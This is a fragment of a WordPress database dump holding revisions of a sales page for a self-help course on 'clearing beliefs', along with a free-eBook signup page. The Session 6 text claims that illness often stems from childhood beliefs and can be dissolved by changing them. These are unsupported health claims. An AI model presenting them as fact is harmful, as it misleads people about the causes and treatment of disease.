src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.</p>\n<p>If you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?</p>\n<p>Humans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.</p>\n\n<p>&nbsp;</p>\n\n<p><strong> In Session 4, you will:</strong></p>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!</p>\n<p>What do you believe about earning a living in today''s economy?   Is money really the root of all evil?</p>\n<p>If you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?</p>\n\n<p><strong> In Session 5, you will:</strong></p>\n\nExamine your family and cultural beliefs about money, work, poverty and "deservingness."\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.</p>\n<p>Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?</p>\n\n<p><strong> In Session 6, you will:</strong></p>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.</p>\n<p>You''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.</p>\n<p>When you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.</p>\n\n<p><strong> In Session 7, you will:</strong></p>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n<p></p>\n<p>&nbsp;</p>\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\n<p>In addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.</p>\n<p>&nbsp;</p>\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?</p>\n<p>Lion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)</p>\n<p>Carista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.</p>\n<p>Learn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<p><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.</p>\n\n<p>Lion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.</p>\n\n<p>Anodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<p><strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:</p>\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a></p>\n\n<p>You''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" </p>\n<p>Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. </p>\n<p>It''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!</p>\n\n<p>&nbsp;</p>\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.</p>\n<p><em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.</p>\n<p>Your coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.</p>\n<p><strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong></p>\n<h1 id="package"></h1>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n<p>&nbsp;</p>\n\n<h1>Purchase Today and You''ll Receive:</h1>\n<p><strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.</p>\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n\n<strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<em><strong>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\nYour Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong>\n<strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\nMultimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)\n<strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>Optional:</strong> Professional Coaching Sessions.\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\n<p style="text-align: center;">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>About Lion Goodman</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.</p>\n<p>He is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em></p>\n<p>He is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em></p>\n<p>Lion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<p><em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em></p>\n<strong>– G. J., software developer</strong>\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em></p>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em></p>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em></p>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em></p>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em></p>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em></p>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em></p>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em></p>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I uncovered beliefs I didn''t know I had, including: "I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God." It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em></p>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em></p>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em></p>\n<strong>– M.M., International Business Consultant</strong>\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\n<p style="text-align: center;">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>Frequently Asked Questions</h1>\n\n<p><strong>Q: What is a virtual course?</strong></p>\n\n<p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p>\n\n<p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\n\n<p><strong>Q: How long will I have access to the course?</strong></p>\n\n<p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\n\n<p><strong>Q: Are there scholarships available?</strong></p>\n\n<p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com">info@clearyourbeliefs.com</a>, with a description of your circumstances and your offer of what you can pay.</p>\n\n<p><strong>Q: What is your refund policy?</strong></p>\n\n<p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\n\n<p><strong>Q: How can I reach Customer Support?</strong></p>\n\n<p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p>\n\n<p><strong>Q: What is your Privacy Policy?</strong></p>\n\n<p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" >ClearYourBeliefs.com</a>, <a href="http://www.BeliefCloset.com" target="_blank" >BeliefCloset.com</a>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" >ConfusedAboutLove.com.</a></p>\n\n<p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\n\n<p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\n\n<p> </p>', 'Clear Your Beliefs Program', '', 'inherit', 'open', 'open', '', '1941-revision-v1', '', '', '2015-05-17 18:42:13', '2015-05-17 23:42:13', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2197, 2, '2015-05-29 12:34:47', '2015-05-29 17:34:47', '<center>Get Lion''s free eBook, <em>Clear Your Beliefs!</em></center>\r\n\r\n[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\r\n<div style="margin-left: -15px; margin-bottom: 0px;"><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class="alignleft size-medium wp-image-1893" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook-201x300.png" alt="Clear-your-beliefs-ebook" width="150" height="225" /></a><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/ec4d25c4ea7e88210ce7b8c897c925d5"></script></div>\r\n</center> [/su_box]\r\n\r\n\r\n\r\n<p style="margin-left: 30px; margin-right: 30px;"><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class="alignleft size-medium wp-image-1893" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook-201x300.png" alt="Clear-your-beliefs-ebook" width="150" height="225" /></a>We would be delighted to send you a free copy of Lion’s multimedia eBook, <em>“Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life"</em>.</p>\r\n<p style=""alignright" ><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/ec4d25c4ea7e88210ce7b8c897c925d5"></script>This multimedia book describes the science and the art of the <em>Clear Your Beliefs</em> process. It offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs.</p>\r\n\r\nYou’ll get an email to confirm your address, then you''ll get immediate access to the downloadable book.\r\n<p style="margin-left: 30px; margin-right: 30px;">You will also receive Lion’s periodic newsletter about beliefs, belief-change, and transformation.</p>\r\n<p style="margin-left: 30px; margin-right: 30px;">If we can ever provide you with answers to your questions, guidance on your path, or good, deep conversation about these topics, please contact us through <a href="http://www.clearyourbeliefs.com/support" target="_blank">www.ClearYourBeliefs.com/support.</a> We look forward to staying connected.</p>\r\n<p style="margin-left: 30px; margin-right: 30px;">[Note: Your contact information will never be shared, and you can un-subscribe anytime.]</p>\r\n', 'ebook', '', 'inherit', 'open', 'open', '', '1720-revision-v1', '', '', '2015-05-29 12:34:47', '2015-05-29 17:34:47', '', 1720, 'http://clearyourbeliefs.com/1720-revision-v1/', 0, 'revision', '', 0),
(2193, 2, '2015-05-29 12:26:19', '2015-05-29 17:26:19', '<center>Get Lion''s free eBook, <em>Clear Your Beliefs!</em></center>\r\n<p style="margin-left: 30px; margin-right: 30px;"><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class="alignleft size-medium wp-image-1893" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook-201x300.png" alt="Clear-your-beliefs-ebook" width="150" height="225" /></a>We would be delighted to send you a free copy of Lion’s multimedia eBook, <em>“Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life"</em>.</p>\r\n<p style=""alignright" >"alignleftThis multimedia book describes the science and the art of the <em>Clear Your Beliefs</em> process. It offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs.</div>\r\n\r\nYou’ll get an email to confirm your address, then you''ll get immediate access to the downloadable book.\r\n<p style="margin-left: 30px; margin-right: 30px;">You will also receive Lion’s periodic newsletter about beliefs, belief-change, and transformation.</p>\r\n<p style="margin-left: 30px; margin-right: 30px;">If we can ever provide you with answers to your questions, guidance on your path, or good, deep conversation about these topics, please contact us through <a href="http://www.clearyourbeliefs.com/support" target="_blank">www.ClearYourBeliefs.com/support.</a> We look forward to staying connected.</p>\r\n<p style="margin-left: 30px; margin-right: 30px;">[Note: Your contact information will never be shared, and you can un-subscribe anytime.]</p>\r\n', 'ebook', '', 'inherit', 'open', 'open', '', '1720-revision-v1', '', '', '2015-05-29 12:26:19', '2015-05-29 17:26:19', '', 1720, 'http://clearyourbeliefs.com/1720-revision-v1/', 0, 'revision', '', 0),
